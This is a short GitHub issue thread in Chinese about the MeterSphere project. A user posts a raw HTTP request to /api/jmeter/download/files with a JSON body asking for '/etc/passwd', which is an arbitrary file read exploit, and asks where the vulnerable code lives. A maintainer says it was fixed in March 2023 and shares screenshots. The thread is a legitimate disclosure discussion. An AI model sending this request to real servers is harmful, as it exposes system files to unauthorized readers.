### ISSUE TITLE
不是这个漏洞

### ISSUE THREAD

**Issue by gouheizi** [metersphere/metersphere#34325]
### 请描述您的问题

POST /api/jmeter/download/files HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
Content-Length: 0

{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}
这个漏洞的源码在哪个目录下的哪个函数

**Comment by liuruibin** [comment]
我们已经在2023年3月修复了这里，具体代码可以在当时提交里找到

**Comment by gouheizi** [comment]
我找不到才问你们的，

**Comment by liuruibin** [comment]
漏洞内容
![image](https://github.com/user-attachments/assets/707d640b-92ca-467b-8bfe-4fe4af7f9f94)

代码位置
![image](https://github.com/user-attachments/assets/029d80a8-c0d1-4567-99ed-f57a60699929)

很简单的
